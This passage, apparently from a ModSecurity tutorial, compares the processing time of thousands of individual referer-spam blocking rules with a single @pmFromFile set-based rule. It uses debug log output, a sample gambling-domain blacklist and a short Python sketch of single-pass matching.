SecRule HTTP_Referer|ARGS "bestgamblinghouseonline\.com"

Let's see the average time that it takes ModSecurity to run through all of these individual rules in phase:2.

# head -3 /usr/local/apache/logs/modsec_debug.log
[20/Jan/2008:02:45:49 --0500] [][rid#9f9dab8][/cgi-bin/foo.cgi][1] Phase 1: 18 usec
[20/Jan/2008:02:45:49 --0500] [][rid#9f9dab8][/cgi-bin/foo.cgi][1] Rule 918e140 [id "-"][file "/usr/local/apache/conf/rules/modsecurity_crs_10_config.conf"][line "86"]: 10 usec
[20/Jan/2008:02:59:47 --0500] [][rid#9f9dab8][/cgi-bin/foo.cgi][1] Phase 2: 83751 usec

So, it took 83751 usec to process the ~7600 individual rules. Now, let's run a similar test, but this time we will use the @pmFromFile operator with an input file containing approximately the same number of text lines. Instead of having thousands of individual SecRule lines, I will use this one line:

SecRule REQUEST_HEADERS:Referer|ARGS "@pmFromFile spam_domains.txt"

The spam_domains.txt file contains approximately 6900 lines such as these:

best-deals-blackjack.info
best-deals-casino.info
best-gambling.biz
bestgamblinghouseonline.com

When I run the same test with this new rule that uses the @pmFromFile operator, you can see the dramatic difference in processing time:

# head -4 /usr/local/apache/logs/modsec_debug.log
[20/Jan/2008:03:20:45 --0500] [webapphoneypot/sid#8971f48][rid#923bf58][/cgi-bin/foo.cgi][1] Phase 1: 20 usec
[20/Jan/2008:03:20:45 --0500] [webapphoneypot/sid#8971f48][rid#923bf58][/cgi-bin/foo.cgi][1] Rule 9202980 [id "-"][file "/usr/local/apache/conf/rules/modsecurity_crs_10_config.conf"][line "86"]: 11 usec
[20/Jan/2008:03:20:45 --0500] [webapphoneypot/sid#8971f48][rid#923bf58][/cgi-bin/foo.cgi][1] Phase 2: 10 usec
[20/Jan/2008:03:20:45 --0500] [webapphoneypot/sid#8971f48][rid#923bf58][/cgi-bin/foo.cgi][1] Rule 9203890 [id "-"][file "/usr/local/apache/conf/rules/modsecurity_crs_15_customrules.conf"][line "1"]: 6 usec

As you can see, it only took 6 usec to complete the @pmFromFile set-based matching operator check! That is a gigantic improvement in overall performance.
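
The reason for the difference is that a set of fixed strings can be compiled ahead of time into a structure that scans the input once, instead of re-scanning the input once per rule. The Python sketch below approximates the idea with a single alternation regex (ModSecurity's @pm operators actually use an Aho-Corasick trie, which scales better still); the domain names are taken from the blacklist example above:

```python
import re

spam_domains = ["best-deals-blackjack.info", "best-gambling.biz",
                "bestdvdclubs.com", "bestgamblinghouseonline.com"]

def match_per_rule(text, domains):
    # Analogous to thousands of individual SecRule lines: the input
    # is scanned once for every pattern in the list.
    return any(re.search(re.escape(d), text) for d in domains)

def match_set_based(text, domains):
    # Analogous to @pmFromFile: all fixed strings are combined ahead
    # of time so the input is scanned only once.
    combined = re.compile("|".join(re.escape(d) for d in domains))
    return combined.search(text) is not None

referer = "http://best-gambling.biz/promo"
# Both approaches find the match; the set-based one does so in one pass.
```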


Set-based pattern matching can increase the overall performance of your ModSecurity rules when used in the proper circumstances. In any situation where you need to inspect a large word list, you should try to leverage these new operators.

